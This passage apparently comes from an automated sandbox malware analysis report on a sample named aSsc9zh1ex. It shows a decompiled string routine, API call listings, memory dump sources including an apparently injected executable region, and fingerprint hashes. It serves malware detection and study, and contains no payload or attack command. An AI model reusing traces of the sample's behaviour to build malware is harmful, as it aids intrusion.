					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                                              0x00405f7f
                                                                                                                              0x00405f81
                                                                                                                              0x00405f84
                                                                                                                              0x00405fb0
                                                                                                                              0x00405f89
                                                                                                                              0x00405f92
                                                                                                                              0x00405f97
                                                                                                                              0x00405fa2
                                                                                                                              0x00405fa5
                                                                                                                              0x00405fc1
                                                                                                                              0x00405fa7
                                                                                                                              0x00405fae
                                                                                                                              0x00000000
                                                                                                                              0x00405fae
                                                                                                                              0x00405fba
                                                                                                                              0x00405fbe
                                                                                                                              0x00405fbe
                                                                                                                              0x00405fb8
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F97
                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA8
                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 190613189-0
                                                                                                                              • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                              • Instruction ID: d1bddae3a0f18f97ac1aa465d67762edc6f3aabfb23b395e61e0e19fb30ac715
                                                                                                                              • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                              • Instruction Fuzzy Hash: 50F0C231205414FFD7029FA5DE049AFBBA8EF06250B2140BAE840F7310DA78DE019BA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:0%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:28.6%
                                                                                                                              Total number of Nodes:7
                                                                                                                              Total number of Limit Nodes:1
                                                                                                                              execution_graph 72282 1d7829f0 LdrInitializeThunk 72283 1672169 TerminateThread 72284 167219b 72283->72284 72286 1d782b20 72288 1d782b2a 72286->72288 72289 1d782b3f LdrInitializeThunk 72288->72289 72290 1d782b31 72288->72290

                                                                                                                              Executed Functions

                                                                                                                              Function 1D782D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 35 1d782d10-1d782d1c LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 69b581a02b63767e22071b5284548493d8e4c5f9926cdc32724d7320e9b478bd
                                                                                                                              • Instruction ID: 96f14d9272542ca47f2ffd0624225fc4f9a5016ddf4d4935d25b19e64c14f576
                                                                                                                              • Opcode Fuzzy Hash: 69b581a02b63767e22071b5284548493d8e4c5f9926cdc32724d7320e9b478bd
                                                                                                                              • Instruction Fuzzy Hash: 5B90023226101453D51561585604B0B000947D1261FD1C956A0418518DD66A8952B133
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 37 1d782dc0-1d782dcc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: e19dfebf5d7858aa78e2a4fdd7c5543e1fedabc26f0455889eb92d24d9b8e488
                                                                                                                              • Instruction ID: 84d047e43f6ad5bf56756fb764c1ac967a52a9006c8924d9342131e0a4d6e275
                                                                                                                              • Opcode Fuzzy Hash: e19dfebf5d7858aa78e2a4fdd7c5543e1fedabc26f0455889eb92d24d9b8e488
                                                                                                                              • Instruction Fuzzy Hash: 4E90027226101442D54471585504B4A000547D1321F91C555A5058514EC66D8DD57677
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 36 1d782da0-1d782dac LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: f32614aed5c3f5e6b3200a16154442033cbaf958b93a82ad2e68647a1aa7ceb7
                                                                                                                              • Instruction ID: d7c3fe1da7611f883cca3acccf1ab5633f7e6192602e1e3e785ee919b06728de
                                                                                                                              • Opcode Fuzzy Hash: f32614aed5c3f5e6b3200a16154442033cbaf958b93a82ad2e68647a1aa7ceb7
                                                                                                                              • Instruction Fuzzy Hash: 5090022266101542D50571585504A1A000A47D1261FD1C566A1018515ECA398992B133
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 33 1d782c50-1d782c5c LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 201c48ccd47ef95646bbb1b05566230d7df74994c4803333bc50c71120b5b9df
                                                                                                                              • Instruction ID: 9340e5ee12d3b2a2ebe3fca98d48caf34fcb97d2409f18f161047fffd03f5cb5
                                                                                                                              • Opcode Fuzzy Hash: 201c48ccd47ef95646bbb1b05566230d7df74994c4803333bc50c71120b5b9df
                                                                                                                              • Instruction Fuzzy Hash: 9990022236101043D54471586518A0A400597E2321F91D555E0408514CD92988566233
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 32 1d782c30-1d782c3c LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: f281c9f0344d38e0d2e429bb06a7691e8a5468e18e7ff0bbe506dd203234294f
                                                                                                                              • Instruction ID: 8571e266e6300d025290f53551bcbac61f6107ae095330fde684e64f058fe45e
                                                                                                                              • Opcode Fuzzy Hash: f281c9f0344d38e0d2e429bb06a7691e8a5468e18e7ff0bbe506dd203234294f
                                                                                                                              • Instruction Fuzzy Hash: E890022A27301042D58471586508A0E000547D2222FD1D959A0009518CC92988696333
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 34 1d782cf0-1d782cfc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 5e0d44ece9248676021759d1e91af365ae19b25faf08ee55a8716d54565a4a15
                                                                                                                              • Instruction ID: 8c4d62b5c55b2290d686c54104af214720debe47627407de1d5874edd21a4b83
                                                                                                                              • Opcode Fuzzy Hash: 5e0d44ece9248676021759d1e91af365ae19b25faf08ee55a8716d54565a4a15
                                                                                                                              • Instruction Fuzzy Hash: 9B9002222A2051925949B158550490B400657E12617D1C556A1408910CC53A9856E633
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 318a59d1cbe6a2e84c451f2bec9d01d711ac5f37f9bcf839720fa008ff7fc83e
                                                                                                                              • Instruction ID: ae673c71653cc68251c3fdc47623913b3d9b280a948cf5014416ac2c6f7fe1a9
                                                                                                                              • Opcode Fuzzy Hash: 318a59d1cbe6a2e84c451f2bec9d01d711ac5f37f9bcf839720fa008ff7fc83e
                                                                                                                              • Instruction Fuzzy Hash: A490022227181082D60465685D14F0B000547D1323F91C659A0148514CC92988616533
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 38 1d782e50-1d782e5c LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: fd134a675db3e5057dc2a4b3fd7536af4548f7e692c883c783cae58ad09d9d5a
                                                                                                                              • Instruction ID: 117681b047248272c72b0f589c27abfcad69f4233f2726148d83fc386619ec60
                                                                                                                              • Opcode Fuzzy Hash: fd134a675db3e5057dc2a4b3fd7536af4548f7e692c883c783cae58ad09d9d5a
                                                                                                                              • Instruction Fuzzy Hash: 729002623A101482D50461585514F0A000587E2321F91C559E1058514DC62DCC527137
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 3b9fa3819a09570a8a303153f9b6517ec1bf73e7bd36b3f15fc4e89f5c230d6d
                                                                                                                              • Instruction ID: 2b9c0c22f2e8ec7895c3381d2d028ab58e391704225094af4983a9c01a9d6573
                                                                                                                              • Opcode Fuzzy Hash: 3b9fa3819a09570a8a303153f9b6517ec1bf73e7bd36b3f15fc4e89f5c230d6d
                                                                                                                              • Instruction Fuzzy Hash: 6790022266101082454471689944D0A40056BE2231791C665A098C510DC56D88656677
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 39 1d782eb0-1d782ebc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 58d881b7ea45fe8a8310a997577df8b0ff302fbfab9b1ec9c49f34dc2f85f51f
                                                                                                                              • Instruction ID: 3e6ba3a1d4b843eef83a4552383e6380fa55dcf96acfad95525d616e7b9c1171
                                                                                                                              • Opcode Fuzzy Hash: 58d881b7ea45fe8a8310a997577df8b0ff302fbfab9b1ec9c49f34dc2f85f51f
                                                                                                                              • Instruction Fuzzy Hash: 1A90023226141442D50461585914B0F000547D1322F91C555A1158515DC63988517573
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7829F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 27 1d7829f0-1d7829fc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 965bd147ca4246cad2f3bfec8259792ae21aa832b01a0976064c8b340c2163d5
                                                                                                                              • Instruction ID: 6b1e706345dbfec33e95c816b488e95174d735eaa6d8bb329b82a926a9c1c229
                                                                                                                              • Opcode Fuzzy Hash: 965bd147ca4246cad2f3bfec8259792ae21aa832b01a0976064c8b340c2163d5
                                                                                                                              • Instruction Fuzzy Hash: 9D900226271010430509A558170490B004647D6371391C565F1009510CD63588616133
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 29 1d782b10-1d782b1c LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b2438d02179a4485c05bf72e4effdbf43d8f4ec1891948acee4f2140c961821d
                                                                                                                              • Instruction ID: f94b1435a4d04f3a27cd0e76472eba299b8769444b9c3da81c72991175ade018
                                                                                                                              • Opcode Fuzzy Hash: b2438d02179a4485c05bf72e4effdbf43d8f4ec1891948acee4f2140c961821d
                                                                                                                              • Instruction Fuzzy Hash: 2690023226101842D58471585504A4E000547D2321FD1C559A0019614DCA298A5977B3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 31 1d782bc0-1d782bcc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b8437ae7238b3d9b257a7469c502558ec836b719fc599b104b75394e78f2c36a
                                                                                                                              • Instruction ID: ec7dae6d3f3eb15b6c9aaa9531a42365e8d567ea5bffe3621cbbade6e62dd7b7
                                                                                                                              • Opcode Fuzzy Hash: b8437ae7238b3d9b257a7469c502558ec836b719fc599b104b75394e78f2c36a
                                                                                                                              • Instruction Fuzzy Hash: 5590023226101442D50465986508A4A000547E1321F91D555A5018515EC67988917133
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 30 1d782b90-1d782b9c LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 03901f17dd90f00631d79b95cd06ab653f514bfc37d7c9e1d53a5fe549e82468
                                                                                                                              • Instruction ID: 05e54d196a4ba7dabc05be234faf1993b1af6f487db27301284b95e4307e6402
                                                                                                                              • Opcode Fuzzy Hash: 03901f17dd90f00631d79b95cd06ab653f514bfc37d7c9e1d53a5fe549e82468
                                                                                                                              • Instruction Fuzzy Hash: B690023226109842D51461589504B4E000547D1321F95C955A4418618DC6A988917133
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 28 1d782a80-1d782a8c LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: f586c5ebb3a54099ef6b54531e4294a074209bf453ce4938741074445e676c5f
                                                                                                                              • Instruction ID: c7ca57e386446df0ac73cc56789267675e450119f1c192564b1a3707dec912a7
                                                                                                                              • Opcode Fuzzy Hash: f586c5ebb3a54099ef6b54531e4294a074209bf453ce4938741074445e676c5f
                                                                                                                              • Instruction Fuzzy Hash: 4790026226201043450971585514A1A400A47E1221B91C565E1008550DC53988917137
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01672169 Relevance: 1.6, APIs: 1, Instructions: 93threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 1672169-167217e TerminateThread 1 167219b-16721f8 call 167218c call 1660556 0->1 7 16721fe-1672213 1->7 8 16723aa-16723be 1->8 7->8 9 1672219-167221d 7->9 9->8 10 1672223-1672227 9->10 10->8 11 167222d-1672231 10->11 11->8 12 1672237-167223b 11->12 12->8 13 1672241-1672245 12->13 13->8 14 167224b-16722a6 13->14 14->8 16 16722ac-16722c4 14->16 17 16722c5-16722d7 16->17 18 1672326-16723a5 17->18 19 16722d9-16722dd 17->19 19->8 20 16722e3-1672324 19->20 20->17
                                                                                                                              APIs
                                                                                                                              • TerminateThread.KERNELBASE ref: 01672173
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42241628080.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1660000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: TerminateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1852365436-0
                                                                                                                              • Opcode ID: 2ac3bd5748a93f336f2116e03bc19afea3cc26d72d46b3190c5d9bc6c2dcaf45
                                                                                                                              • Instruction ID: 0fcb15ec27e2a4b10dd818758bf526757d0bdb375908ed17ac204358d1463116
                                                                                                                              • Opcode Fuzzy Hash: 2ac3bd5748a93f336f2116e03bc19afea3cc26d72d46b3190c5d9bc6c2dcaf45
